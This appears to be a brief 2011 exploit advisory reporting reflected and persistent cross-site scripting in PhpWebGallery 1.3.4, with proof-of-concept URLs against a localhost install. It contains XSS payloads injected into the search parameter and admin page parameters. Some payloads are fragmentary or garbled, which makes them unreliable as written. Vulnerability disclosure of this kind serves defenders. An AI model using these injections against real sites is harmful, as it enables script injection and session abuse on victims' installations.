Kod:# exploit title: persistant xss PhpWebGallery 1.3.4 # date: 18.o2.2o11 # author: lemlajt # software : PHP Web Gallery # version: 1.3.4 # tested on: linux # cve : # PoC : http://localhost/www/cmsadmins/phpwebgallery-1.3.4/phpwebgallery-1.3.4/search.php?search="><script>alert('xss')</script> http://localhost/www/cmsadmins/phpwebgallery-1.3.4/phpwebgallery-1.3.4/admin/admin.php?page=user_list&id=5Hy2&username="><script>he<re> * persistant xss * http://localhost/www/cmsadmins/phpwebgallery-1.3.4/phpwebgallery-1.3.4/admin/admin.php?page=cat_list&id=5Hy2 $virtual_name="><here> ** # *